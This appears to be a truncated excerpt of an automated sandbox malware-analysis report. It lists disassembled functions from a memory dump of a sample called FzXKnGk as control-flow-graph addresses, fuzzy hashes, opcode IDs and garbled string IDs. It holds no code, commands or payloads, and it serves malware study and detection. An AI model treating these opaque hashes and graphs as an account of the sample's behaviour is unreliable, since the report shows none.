                                                                                                                                                    control_flow_graph 2273 183c147-183c158 2274 183c184 2273->2274 2275 183c15a-183c172 2273->2275 2276 183c186-183c18a 2274->2276 2279 183c174-183c179 2275->2279 2280 183c17b-183c17e 2275->2280 2279->2276 2281 183c180-183c182 2280->2281 2282 183c18b-183c199 2280->2282 2281->2274 2281->2275 2284 183c19b-183c19d 2282->2284 2285 183c1bc-183c1bf 2282->2285 2286 183c1c0-183c1c1 2284->2286 2287 183c19f-183c1a1 2284->2287 2285->2286 2289 183c1c4-183c1c8 2286->2289 2288 183c1a3-183c1b8 2287->2288 2287->2289 2288->2285 2290 183c1ca 2289->2290 2291 183c1cf-183c2ac call 18341a0 call 1833cc0 2289->2291 2290->2291 2301 183c2b3-183c2d4 call 1835658 2291->2301 2302 183c2ae 2291->2302 2304 183c2d9-183c2e4 2301->2304 2302->2301 2305 183c2e6 2304->2305 2306 183c2eb-183c2ef 2304->2306 2305->2306 2307 183c2f1-183c2f2 2306->2307 2308 183c2f4-183c2fb 2306->2308 2309 183c313-183c357 2307->2309 2310 183c302-183c310 2308->2310 2311 183c2fd 2308->2311 2315 183c3bd-183c3d4 2309->2315 2310->2309 2311->2310 2317 183c3d6-183c3fb 2315->2317 2318 183c359-183c36f 2315->2318 2324 183c413 2317->2324 2325 183c3fd-183c412 2317->2325 2322 183c371-183c37d 2318->2322 2323 183c399 2318->2323 2326 183c387-183c38d 2322->2326 2327 183c37f-183c385 2322->2327 2328 183c39f-183c3bc 2323->2328 2325->2324 2329 183c397 2326->2329 2327->2329 2328->2315 2329->2328
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000C.00000002.2940123502.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_12_2_1830000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: PH^q$PH^q
                                                                                                                                                    • API String ID: 0-1598597984
                                                                                                                                                    • Opcode ID: 04aec2da8c063fffd80940b01fb3313d688d544491f9c7b1bc04a29c6c4c8845
                                                                                                                                                    • Instruction ID: 8bc5e91b22b3cdb5bbc6a0f1a2e5021441bc0dc34ad2c17904a329194c6b464d
                                                                                                                                                    • Opcode Fuzzy Hash: 04aec2da8c063fffd80940b01fb3313d688d544491f9c7b1bc04a29c6c4c8845
                                                                                                                                                    • Instruction Fuzzy Hash: B4A1D375E01618CFDB54CFAAD884A9DBBF2BF89310F18806AE409EB365DB309945CF51
                                                                                                                                                    Function 01835362 Relevance: 2.7, Strings: 2, Instructions: 195COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2333 1835362-1835364 2334 1835366-18353a0 2333->2334 2335 18353c4-1835484 call 18341a0 call 1833cc0 2333->2335 2336 18353a2 2334->2336 2337 18353a7-18353c2 2334->2337 2347 1835486 2335->2347 2348 183548b-18354a9 2335->2348 2336->2337 2337->2335 2347->2348 2378 18354ac call 1835649 2348->2378 2379 18354ac call 1835658 2348->2379 2349 18354b2-18354bd 2350 18354c4-18354c8 2349->2350 2351 18354bf 2349->2351 2352 18354ca-18354cb 2350->2352 2353 18354cd-18354d4 2350->2353 2351->2350 2354 18354ec-1835530 2352->2354 2355 18354d6 2353->2355 2356 18354db-18354e9 2353->2356 2360 1835596-18355ad 2354->2360 2355->2356 2356->2354 2362 1835532-1835548 2360->2362 2363 18355af-18355d4 2360->2363 2367 1835572 2362->2367 2368 183554a-1835556 2362->2368 2370 18355d6-18355eb 2363->2370 2371 18355ec 2363->2371 2369 1835578-1835595 2367->2369 2372 1835560-1835566 2368->2372 2373 1835558-183555e 2368->2373 2369->2360 2370->2371 2374 1835570 2372->2374 2373->2374 2374->2369 2378->2349 2379->2349
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000C.00000002.2940123502.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_12_2_1830000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: PH^q$PH^q
                                                                                                                                                    • API String ID: 0-1598597984
                                                                                                                                                    • Opcode ID: ab45b9d5c963201ee725d97e297be038cb7d3edec702d9c327dd55f4703deb68
                                                                                                                                                    • Instruction ID: a3e5f09b8bbbf488b1b5e4dfd7dd551b3d95ccb55fa4b9785eb89423070fdb70
                                                                                                                                                    • Opcode Fuzzy Hash: ab45b9d5c963201ee725d97e297be038cb7d3edec702d9c327dd55f4703deb68
                                                                                                                                                    • Instruction Fuzzy Hash: C791B474E00218CFDB18CFAAD984A9DBBF2BF89310F149069E409EB365DB359945CF51
                                                                                                                                                    Function 0183C468 Relevance: 2.7, Strings: 2, Instructions: 192COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2380 183c468-183c471 2381 183c473-183c491 2380->2381 2382 183c494-183c498 2380->2382 2381->2382 2383 183c49a 2382->2383 2384 183c49f-183c57c call 18341a0 call 1833cc0 2382->2384 2383->2384 2394 183c583-183c5a4 call 1835658 2384->2394 2395 183c57e 2384->2395 2397 183c5a9-183c5b4 2394->2397 2395->2394 2398 183c5b6 2397->2398 2399 183c5bb-183c5bf 2397->2399 2398->2399 2400 183c5c1-183c5c2 2399->2400 2401 183c5c4-183c5cb 2399->2401 2402 183c5e3-183c627 2400->2402 2403 183c5d2-183c5e0 2401->2403 2404 183c5cd 2401->2404 2408 183c68d-183c6a4 2402->2408 2403->2402 2404->2403 2410 183c6a6-183c6cb 2408->2410 2411 183c629-183c63f 2408->2411 2417 183c6e3 2410->2417 2418 183c6cd-183c6e2 2410->2418 2415 183c641-183c64d 2411->2415 2416 183c669 2411->2416 2419 183c657-183c65d 2415->2419 2420 183c64f-183c655 2415->2420 2421 183c66f-183c68c 2416->2421 2418->2417 2422 183c667 2419->2422 2420->2422 2421->2408 2422->2421
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000C.00000002.2940123502.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_12_2_1830000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: PH^q$PH^q
                                                                                                                                                    • API String ID: 0-1598597984
                                                                                                                                                    • Opcode ID: 109664db224de27868db375546afe4c6b63004e425a06e3ffb951a76f1658532
                                                                                                                                                    • Instruction ID: 8a678009ecbb8674424abc5ac5392c6eee1f503f3090ca37e2a6cf7008452693
                                                                                                                                                    • Opcode Fuzzy Hash: 109664db224de27868db375546afe4c6b63004e425a06e3ffb951a76f1658532
                                                                                                                                                    • Instruction Fuzzy Hash: 7181B274E00218CFDB14CFAAD984A9DBBF2BF88310F14906AE419EB365EB349945CF51
                                                                                                                                                    Function 0183D278 Relevance: 2.7, Strings: 2, Instructions: 188COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2426 183d278-183d2a8 2427 183d2aa 2426->2427 2428 183d2af-183d38c call 18341a0 call 1833cc0 2426->2428 2427->2428 2438 183d393-183d3b4 call 1835658 2428->2438 2439 183d38e 2428->2439 2441 183d3b9-183d3c4 2438->2441 2439->2438 2442 183d3c6 2441->2442 2443 183d3cb-183d3cf 2441->2443 2442->2443 2444 183d3d1-183d3d2 2443->2444 2445 183d3d4-183d3db 2443->2445 2446 183d3f3-183d437 2444->2446 2447 183d3e2-183d3f0 2445->2447 2448 183d3dd 2445->2448 2452 183d49d-183d4b4 2446->2452 2447->2446 2448->2447 2454 183d4b6-183d4db 2452->2454 2455 183d439-183d44f 2452->2455 2461 183d4f3 2454->2461 2462 183d4dd-183d4f2 2454->2462 2459 183d451-183d45d 2455->2459 2460 183d479 2455->2460 2463 183d467-183d46d 2459->2463 2464 183d45f-183d465 2459->2464 2465 183d47f-183d49c 2460->2465 2462->2461 2466 183d477 2463->2466 2464->2466 2465->2452 2466->2465
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000C.00000002.2940123502.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_12_2_1830000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: PH^q$PH^q
                                                                                                                                                    • API String ID: 0-1598597984
                                                                                                                                                    • Opcode ID: 51903e2955972d97557f8204155adcb32a70d7cf4073bfeb1b684665b5332d5c
                                                                                                                                                    • Instruction ID: e4a01f274e1633deb269003ee88a531804eec457fa57f9e6ca66cea8f184d460
                                                                                                                                                    • Opcode Fuzzy Hash: 51903e2955972d97557f8204155adcb32a70d7cf4073bfeb1b684665b5332d5c
                                                                                                                                                    • Instruction Fuzzy Hash: 6D81C274E00218CFDB14DFAAD984A9DBBF2BF89310F14C169E419AB365EB34A945CF50
                                                                                                                                                    Function 0183CA08 Relevance: 2.7, Strings: 2, Instructions: 187COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2470 183ca08-183ca38 2472 183ca3a 2470->2472 2473 183ca3f-183cb1c call 18341a0 call 1833cc0 2470->2473 2472->2473 2483 183cb23-183cb44 call 1835658 2473->2483 2484 183cb1e 2473->2484 2486 183cb49-183cb54 2483->2486 2484->2483 2487 183cb56 2486->2487 2488 183cb5b-183cb5f 2486->2488 2487->2488 2489 183cb61-183cb62 2488->2489 2490 183cb64-183cb6b 2488->2490 2491 183cb83-183cbc7 2489->2491 2492 183cb72-183cb80 2490->2492 2493 183cb6d 2490->2493 2497 183cc2d-183cc44 2491->2497 2492->2491 2493->2492 2499 183cc46-183cc6b 2497->2499 2500 183cbc9-183cbdf 2497->2500 2507 183cc83 2499->2507 2508 183cc6d-183cc82 2499->2508 2504 183cbe1-183cbed 2500->2504 2505 183cc09 2500->2505 2509 183cbf7-183cbfd 2504->2509 2510 183cbef-183cbf5 2504->2510 2506 183cc0f-183cc2c 2505->2506 2506->2497 2508->2507 2511 183cc07 2509->2511 2510->2511 2511->2506
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000C.00000002.2940123502.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_12_2_1830000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: PH^q$PH^q
                                                                                                                                                    • API String ID: 0-1598597984
                                                                                                                                                    • Opcode ID: decc8eaccf7572009b18086c57eb9321d59ba6db32486079b1550cca390a61b7
                                                                                                                                                    • Instruction ID: a6443df62c1fde03ebec34a356352ac22f86d665fd774d04167ac590b2d16866
                                                                                                                                                    • Opcode Fuzzy Hash: decc8eaccf7572009b18086c57eb9321d59ba6db32486079b1550cca390a61b7
                                                                                                                                                    • Instruction Fuzzy Hash: D681A274E00218CFDB18DFAAD884A9DBBF2BF88310F14D06AE419AB365DB349945CF51
                                                                                                                                                    Function 0183CCD8 Relevance: 2.7, Strings: 2, Instructions: 186COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2515 183ccd8-183cd08 2516 183cd0a 2515->2516 2517 183cd0f-183cdec call 18341a0 call 1833cc0 2515->2517 2516->2517 2527 183cdf3-183ce14 call 1835658 2517->2527 2528 183cdee 2517->2528 2530 183ce19-183ce24 2527->2530 2528->2527 2531 183ce26 2530->2531 2532 183ce2b-183ce2f 2530->2532 2531->2532 2533 183ce31-183ce32 2532->2533 2534 183ce34-183ce3b 2532->2534 2535 183ce53-183ce97 2533->2535 2536 183ce42-183ce50 2534->2536 2537 183ce3d 2534->2537 2541 183cefd-183cf14 2535->2541 2536->2535 2537->2536 2543 183cf16-183cf3b 2541->2543 2544 183ce99-183ceaf 2541->2544 2550 183cf53 2543->2550 2551 183cf3d-183cf52 2543->2551 2547 183ceb1-183cebd 2544->2547 2548 183ced9 2544->2548 2552 183cec7-183cecd 2547->2552 2553 183cebf-183cec5 2547->2553 2554 183cedf-183cefc 2548->2554 2551->2550 2555 183ced7 2552->2555 2553->2555 2554->2541 2555->2554
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000C.00000002.2940123502.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_12_2_1830000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: PH^q$PH^q
                                                                                                                                                    • API String ID: 0-1598597984
                                                                                                                                                    • Opcode ID: d2e0abad20116cbe67e7c9795e23b85aabac471af225b082934546764d3cf49b
                                                                                                                                                    • Instruction ID: fcd4d6aca7229cfe9caa88990fa3dba27296500f94f9e19913bd516e2b07c643
                                                                                                                                                    • Opcode Fuzzy Hash: d2e0abad20116cbe67e7c9795e23b85aabac471af225b082934546764d3cf49b
                                                                                                                                                    • Instruction Fuzzy Hash: FE81B274E00218CFDB14DFAAD984A9DBBF2BF88310F14D06AE419AB365DB349985CF51
                                                                                                                                                    Function 0183C738 Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2559 183c738-183c768 2560 183c76a 2559->2560 2561 183c76f-183c84c call 18341a0 call 1833cc0 2559->2561 2560->2561 2571 183c853-183c874 call 1835658 2561->2571 2572 183c84e 2561->2572 2574 183c879-183c884 2571->2574 2572->2571 2575 183c886 2574->2575 2576 183c88b-183c88f 2574->2576 2575->2576 2577 183c891-183c892 2576->2577 2578 183c894-183c89b 2576->2578 2581 183c8b3-183c8f7 2577->2581 2579 183c8a2-183c8b0 2578->2579 2580 183c89d 2578->2580 2579->2581 2580->2579 2585 183c95d-183c974 2581->2585 2587 183c976-183c99b 2585->2587 2588 183c8f9-183c90f 2585->2588 2595 183c9b3 2587->2595 2596 183c99d-183c9b2 2587->2596 2592 183c911-183c91d 2588->2592 2593 183c939 2588->2593 2597 183c927-183c92d 2592->2597 2598 183c91f-183c925 2592->2598 2594 183c93f-183c95c 2593->2594 2594->2585 2596->2595 2599 183c937 2597->2599 2598->2599 2599->2594
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000C.00000002.2940123502.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_12_2_1830000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: PH^q$PH^q
                                                                                                                                                    • API String ID: 0-1598597984
                                                                                                                                                    • Opcode ID: 58a58988ead5671a945d76db567cca9a76f13ca96be596aaed9cfa71d8fc9d43
                                                                                                                                                    • Instruction ID: 9f5977a6b70aa56d314a5a16b872898bac539d1f6af7270613c3359ae9a31ce0
                                                                                                                                                    • Opcode Fuzzy Hash: 58a58988ead5671a945d76db567cca9a76f13ca96be596aaed9cfa71d8fc9d43
                                                                                                                                                    • Instruction Fuzzy Hash: 3881B474E00218CFDB14DFAAD984A9DBBF2BF88310F14C06AE819AB365DB349945CF50
                                                                                                                                                    Function 0183CFAB Relevance: 2.7, Strings: 2, Instructions: 184COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2603 183cfab-183cfd8 2604 183cfda 2603->2604 2605 183cfdf-183d0bc call 18341a0 call 1833cc0 2603->2605 2604->2605 2615 183d0c3-183d0e4 call 1835658 2605->2615 2616 183d0be 2605->2616 2618 183d0e9-183d0f4 2615->2618 2616->2615 2619 183d0f6 2618->2619 2620 183d0fb-183d0ff 2618->2620 2619->2620 2621 183d101-183d102 2620->2621 2622 183d104-183d10b 2620->2622 2623 183d123-183d167 2621->2623 2624 183d112-183d120 2622->2624 2625 183d10d 2622->2625 2629 183d1cd-183d1e4 2623->2629 2624->2623 2625->2624 2631 183d1e6-183d20b 2629->2631 2632 183d169-183d17f 2629->2632 2638 183d223 2631->2638 2639 183d20d-183d222 2631->2639 2636 183d181-183d18d 2632->2636 2637 183d1a9 2632->2637 2640 183d197-183d19d 2636->2640 2641 183d18f-183d195 2636->2641 2642 183d1af-183d1cc 2637->2642 2639->2638 2643 183d1a7 2640->2643 2641->2643 2642->2629 2643->2642
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000C.00000002.2940123502.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_12_2_1830000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: PH^q$PH^q
                                                                                                                                                    • API String ID: 0-1598597984
                                                                                                                                                    • Opcode ID: 3a405da57d5b39a6c234982134ec0cae77eb83d532ae97e6d6966f2908f3fd06
                                                                                                                                                    • Instruction ID: ac346a582ca6865aaeec96c18878db9b3bf6d05badc67bd64da62fce5ad7c69e
                                                                                                                                                    • Opcode Fuzzy Hash: 3a405da57d5b39a6c234982134ec0cae77eb83d532ae97e6d6966f2908f3fd06
                                                                                                                                                    • Instruction Fuzzy Hash: 5A81B074E00208CFDB18DFAAD984A9DFBF2BF88310F149169E409AB365DB349985CF50
                                                                                                                                                    Function 0183F631 Relevance: .3, Instructions: 277COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000C.00000002.2940123502.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_12_2_1830000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 77e0908f1d80b198bcfbe4f05817117212e403660eb0b33d04fde086ae114b7d
                                                                                                                                                    • Instruction ID: 48553daf7ec3b108c9a7639766448cbcf6ae866941d81bf500b40ca3cdb1d890
                                                                                                                                                    • Opcode Fuzzy Hash: 77e0908f1d80b198bcfbe4f05817117212e403660eb0b33d04fde086ae114b7d
                                                                                                                                                    • Instruction Fuzzy Hash: 24C1CF74E00218CFDB54DFA9C944BADBBB2EF89300F2480A9D409AB365DB359E85CF51
                                                                                                                                                    Function 0183E988 Relevance: .1, Instructions: 147COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000C.00000002.2940123502.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_12_2_1830000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: e2da7c72c0f39f844ed7bee40e4ca62b195d5b08072dd24a122fd7a65810eb2e
                                                                                                                                                    • Instruction ID: 23ff01198cef2da0e28c03a680accfc56dc80f16fc266999fd548a03b6ab078c
                                                                                                                                                    • Opcode Fuzzy Hash: e2da7c72c0f39f844ed7bee40e4ca62b195d5b08072dd24a122fd7a65810eb2e
                                                                                                                                                    • Instruction Fuzzy Hash: 7151A474E00208DFDB18DFAAD584A9DBBB6FF88300F249029E815BB364DB359945CF50
                                                                                                                                                    Function 0183E97B Relevance: .1, Instructions: 146COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000C.00000002.2940123502.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_12_2_1830000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2fd35c28d2a251c13265cc75ea5a3d48e7d6eb0f680e12a633d443858b314fb1
                                                                                                                                                    • Instruction ID: 635a74a8280a5d52da0a01c2ebf93800415efabd6f6bcc1a8d620df15e76168f
                                                                                                                                                    • Opcode Fuzzy Hash: 2fd35c28d2a251c13265cc75ea5a3d48e7d6eb0f680e12a633d443858b314fb1
                                                                                                                                                    • Instruction Fuzzy Hash: 2A519474E00208DFDB18DFAAD584A9DBBB2FF88300F249129E815BB364DB359946CF50
                                                                                                                                                    Function 018376F1 Relevance: 10.5, Strings: 8, Instructions: 475COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 0 18376f1-1837725 1 1837b54-1837b58 0->1 2 183772b-183774e 0->2 3 1837b71-1837b7f 1->3 4 1837b5a-1837b6e 1->4 11 1837754-1837761 2->11 12 18377fc-1837800 2->12 9 1837b81-1837b96 3->9 10 1837bf0-1837c05 3->10 17 1837b98-1837b9b 9->17 18 1837b9d-1837baa 9->18 19 1837c07-1837c0a 10->19 20 1837c0c-1837c19 10->20 24 1837763-183776e 11->24 25 1837770 11->25 15 1837802-1837810 12->15 16 1837848-1837851 12->16 15->16 36 1837812-183782d 15->36 21 1837c67 16->21 22 1837857-1837861 16->22 26 1837bac-1837bed 17->26 18->26 27 1837c1b-1837c56 19->27 20->27 30 1837c6c-1837c9c 21->30 22->1 28 1837867-1837870 22->28 31 1837772-1837774 24->31 25->31 75 1837c5d-1837c64 27->75 34 1837872-1837877 28->34 35 183787f-183788b 28->35 63 1837cb5-1837cbc 30->63 64 1837c9e-1837cb4 30->64 31->12 38 183777a-18377dc 31->38 34->35 35->30 41 1837891-1837897 35->41 59 183783b 36->59 60 183782f-1837839 36->60 87 18377e2-18377f9 38->87 88 18377de 38->88 43 1837b3e-1837b42 41->43 44 183789d-18378ad 41->44 43->21 48 1837b48-1837b4e 43->48 57 18378c1-18378c3 44->57 58 18378af-18378bf 44->58 48->1 48->28 61 18378c6-18378cc 57->61 58->61 62 183783d-183783f 59->62 60->62 61->43 67 18378d2-18378e1 61->67 62->16 68 1837841 62->68 72 18378e7 67->72 73 183798f-18379ba call 1837538 * 2 67->73 68->16 77 18378ea-18378fb 72->77 91 18379c0-18379c4 73->91 92 1837aa4-1837abe 73->92 77->30 80 1837901-1837913 77->80 80->30 82 1837919-1837931 80->82 145 1837933 call 18380c9 82->145 146 1837933 call 18380d8 82->146 86 1837939-1837949 86->43 90 183794f-1837952 86->90 87->12 88->87 93 1837954-183795a 90->93 94 183795c-183795f 90->94 91->43 96 18379ca-18379ce 91->96 92->1 114 1837ac4-1837ac8 92->114 93->94 97 1837965-1837968 93->97 94->21 94->97 99 18379d0-18379dd 96->99 100 18379f6-18379fc 96->100 101 1837970-1837973 97->101 102 183796a-183796e 97->102 117 18379df-18379ea 99->117 118 18379ec 99->118 104 1837a37-1837a3d 100->104 105 18379fe-1837a02 100->105 101->21 103 1837979-183797d 101->103 102->101 102->103 103->21 106 1837983-1837989 103->106 108 1837a49-1837a4f 104->108 109 1837a3f-1837a43 104->109 105->104 107 1837a04-1837a0d 105->107 106->73 106->77 112 1837a0f-1837a14 107->112 113 1837a1c-1837a32 107->113 115 1837a51-1837a55 108->115 116 1837a5b-1837a5d 108->116 109->75 109->108 112->113 113->43 122 1837b04-1837b08 114->122 123 1837aca-1837ad4 call 18363e0 114->123 115->43 115->116 119 1837a92-1837a94 116->119 120 1837a5f-1837a68 116->120 121 18379ee-18379f0 117->121 118->121 119->43 128 1837a9a-1837aa1 119->128 126 1837a77-1837a8d 120->126 127 1837a6a-1837a6f 120->127 121->43 121->100 122->75 130 1837b0e-1837b12 122->130 123->122 133 1837ad6-1837aeb 123->133 126->43 127->126 130->75 132 1837b18-1837b25 130->132 136 1837b27-1837b32 132->136 137 1837b34 132->137 133->122 142 1837aed-1837b02 133->142 139 1837b36-1837b38 136->139 137->139 139->43 139->75 142->1 142->122 145->86 146->86
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000C.00000002.2940123502.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_12_2_1830000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                                                                                                                    • API String ID: 0-1932283790
                                                                                                                                                    • Opcode ID: 3036cd2d73e591b66f999c21ec181f137ee61dce401c2dccde41c949415e97b4
                                                                                                                                                    • Instruction ID: 1d9f94fc19a8b1672944390e7079c320fb81a0a1523eeb8ef249649d39487fb4
                                                                                                                                                    • Opcode Fuzzy Hash: 3036cd2d73e591b66f999c21ec181f137ee61dce401c2dccde41c949415e97b4
                                                                                                                                                    • Instruction Fuzzy Hash: 27124A70A002498FDB25CF69D984A9EBBF1FF88314F188599E915DB361D730EE45CB90
                                                                                                                                                    Function 01835F38 Relevance: 2.8, Strings: 2, Instructions: 266COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2106 1835f38-1835f5a 2107 1835f70-1835f7b 2106->2107 2108 1835f5c-1835f60 2106->2108 2111 1836023-183604f 2107->2111 2112 1835f81-1835f83 2107->2112 2109 1835f62-1835f6e 2108->2109 2110 1835f88-1835f8f 2108->2110 2109->2107 2109->2110 2114 1835f91-1835f98 2110->2114 2115 1835faf-1835fb8 2110->2115 2118 1836056-18360ae 2111->2118 2113 183601b-1836020 2112->2113 2114->2115 2116 1835f9a-1835fa5 2114->2116 2185 1835fba call 1835f2b 2115->2185 2186 1835fba call 1835f38 2115->2186 2116->2118 2119 1835fab-1835fad 2116->2119 2138 18360b0-18360b6 2118->2138 2139 18360bd-18360cf 2118->2139 2119->2113 2120 1835fc0-1835fc2 2121 1835fc4-1835fc8 2120->2121 2122 1835fca-1835fd2 2120->2122 2121->2122 2127 1835fe5-1836004 call 18369a0 2121->2127 2124 1835fe1-1835fe3 2122->2124 2125 1835fd4-1835fd9 2122->2125 2124->2113 2125->2124 2132 1836006-183600f 2127->2132 2133 1836019 2127->2133 2190 1836011 call 183aef0 2132->2190 2191 1836011 call 183afad 2132->2191 2133->2113 2135 1836017 2135->2113 2138->2139 2141 1836163-1836165 2139->2141 2142 18360d5-18360d9 2139->2142 2188 1836167 call 1836300 2141->2188 2189 1836167 call 18362f0 2141->2189 2143 18360db-18360e7 2142->2143 2144 18360e9-18360f6 2142->2144 2152 18360f8-1836102 2143->2152 2144->2152 2145 183616d-1836173 2146 1836175-183617b 2145->2146 2147 183617f-1836186 2145->2147 2150 18361e1-1836240 2146->2150 2151 183617d 2146->2151 2166 1836247-183625e 2150->2166 2151->2147 2155 1836104-1836113 2152->2155 2156 183612f-1836133 2152->2156 2164 1836123-183612d 2155->2164 2165 1836115-183611c 2155->2165 2157 1836135-183613b 2156->2157 2158 183613f-1836143 2156->2158 2161 1836189-18361da 2157->2161 2162 183613d 2157->2162 2158->2147 2163 1836145-1836149 2158->2163 2161->2150 2162->2147 2163->2166 2167 183614f-1836161 2163->2167 2164->2156 2165->2164 2167->2147 2185->2120 2186->2120 2188->2145 2189->2145 2190->2135 2191->2135
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000C.00000002.2940123502.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_12_2_1830000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: Hbq$Hbq
                                                                                                                                                    • API String ID: 0-4258043069
                                                                                                                                                    • Opcode ID: bdc40a8e15543d7cf19c57c5eeced8e4e621ec82436d517c267b981458c36fcb
